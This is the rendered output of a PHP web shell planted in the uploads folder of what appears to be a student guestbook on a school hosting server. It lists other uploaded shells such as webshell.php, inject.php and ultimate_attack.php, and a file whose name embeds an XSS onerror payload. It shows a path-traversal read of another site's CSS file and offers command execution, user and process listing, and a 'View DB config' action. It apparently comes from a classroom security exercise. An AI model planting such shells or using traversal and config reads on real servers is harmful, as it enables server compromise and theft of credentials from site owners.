🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../584683.klas4s23.mid-ica.nl/public_html/../public_html/Gastenboek/gastenboek.css

html {
    font-family: Impact;
    scrollbar-color: #ded2b4 white;
}

@media screen and (min-width:500px) {

    form {
        display: grid;
        grid-template-columns: 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr;
        grid-template-rows: 1fr 1fr 1fr 1fr 1fr 1fr;
        gap: 0px 0px;
        background-color: #ded2b4;
        border: 4px white dashed;
    }

    .formPlacement {
        grid-area: 1 / 1 / 7 / 4;
        display: flex;
        flex-direction: column;
        padding: 5px;
    }

    .commentsPlacement {
        grid-area: 1 / 4 / 7 / 9;
    }

    #comments {
        height: 670px;
        width: 850px;
        display: flex;
        flex-direction: row;
        overflow: auto;
        flex-wrap: wrap;
        align-content: flex-start;
    }

    .comment {
        width: 250px;
    }

    .headerComment {
        display: flex;
        flex-direction: row;
    }

    h1,
    label {
        margin: 10px 0px 0px 10px;
    }

    h1 {
        font-size: 40px;
    }

    #nancy {
        font-size: 50px;
    }

    .inputFields {
        width: 200px;
    }

    .inputFields,
    #submit {
        width: min-content;
    }
}

@media screen and (max-width:499px) {
    form {
        display: grid;
        grid-template-columns: 1fr 1fr 1fr 1fr 1fr 1fr;
        grid-template-rows: 1fr 1fr 1fr 1fr;
        gap: 0px 0px;
        background-color: #ded2b4;
        border: 4px white dashed;
        height: fit-content;
    }

    .formPlacement {
        grid-area: 1 / 1 / 3 / 8;
        display: flex;
        flex-direction: column;
    }

    .commentsPlacement {
        grid-area: 3 / 1 / 7 / 8;
        margin-top: -30px;
    }

    #comments {
        overflow: scroll;
        height: 800px;
    }

    h1 {
        margin: 10px 0px 0px 0px;
        text-align: center;
        font-size: 42px;
    }

    #nancy {
        font-size: 52px;
    }

    .comment,
    .inputFields {
        width: auto;
    }

    .comment {
        flex-direction: column;
    }
}

h1,
label {
    color: white;
    text-shadow: 2px 1px 0px #9a8f73;
}

label {
    margin: 10px 0px 0px 10px;
    font-size: 25px;
}

h1 {
    font-weight: normal;
    margin-bottom: 5px;
}

#nancy {
    font-family: Whisper;
    margin-top: -5px;
    color: black;
}

#nameIcon {
    width: 50px;
    height: 50px;
    border: none;
    outline: none;
    margin-top: -10px;
    position: relative;
    top: 17px;
    left: 7px;
    border-radius: 0px;
}

.details {
    color: white;
    font-family: Impact;
    text-shadow: 2px 1px 0px #9a8f73;
}

.inputFields,
#submit {
    margin: 10px;
}

.inputFields::placeholder {
    font-size: 15px;
    color: #9a8f7394;
}

textarea {
    resize: none;
    scrollbar-color: #ded2b4 #a69c80;
    scrollbar-width: thin;
    height: auto;
}

#requirementText {
    font-size: 15px;
    color: #9a8f73;
    font-family: 'Franklin Gothic Medium';
    text-shadow: none;
}

#chooseText {
    font-size: 17px;
    color: #9a8f73;
    text-shadow: none;
}

input[type=text] {
    height: 35px;
}

input[type=file] {
    margin: 10px 0px 0px 10px;
}

.inputFields {
    box-shadow: inset 2px 2px 5px #b0b0b0;
    transition: all.1s ease-in-out;
    border: #ded2b4 inset 2px;
    border-radius: 3px;
    color: black;
    font-family: 'Franklin Gothic Medium';
    font-size: 20px;
}

.inputFields:focus {
    border: #ded2b4 inset 4px;
    outline-style: dashed;
    outline-color: white;
}

#submit {
    background-color: #ded2b4;
    border: outset 3px #d3c8ab;
    color: white;
    text-shadow: 2px 1px 0px #9a8f73;
    font-size: 16px;
    font-family: Impact;
    height: 30px;
    width: 80px;
}

#submit:hover {
    cursor: pointer;
    border: inset 3px #d3c8ab;
    text-shadow: -1px -1px 0px #9a8f73;
}

#comments {
    scrollbar-color: #ded2b4 #a69c80;
    scrollbar-width: thin;
    margin-top: 10px;
    box-shadow: inset 3px 3px 5px #a69c80;
}

.comment {
    background-color: white;
    border: outset 2px white;
    border-radius: 2px;
    box-shadow: 2px 2px 5px #9a8f73;
    height: min-content;
    margin: 10px;
}

p {
    margin: 5px;
    padding: 2px;
}

#error {
    font-size: 24px;
    color: #dc0000;
    font-family: 'Franklin Gothic Medium';
    text-shadow: 2px 1px 0px #9a8f73;
    width: max-content;
    border-bottom: dashed 2px white;
    display: none;
    margin: 10px 0px 0px 10px;
}

.email {
    font-size: 15px;
    color: #9a8f73;
}

.time {
    font-size: 10px;
    color: #323232;
}

.commentContent {
    border: solid grey 1px;
    width: 235px;
    color: #323232;
    font-family: 'Franklin Gothic Medium';
    text-overflow: ellipsis;
    overflow: hidden;
    background-color: white;
}

.morelink {
    color: #9a8f73;
    text-decoration: none;
    transition: all.3s ease-in-out;
    font-size: 14px;
}

.morelink:hover {
    color: black;
}

.comment img {
    width: 50px;
    height: 50px;
    border: white dashed 1.5px;
    outline: #9a8f73;
    margin: 5px;
    border-radius: 999px;
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!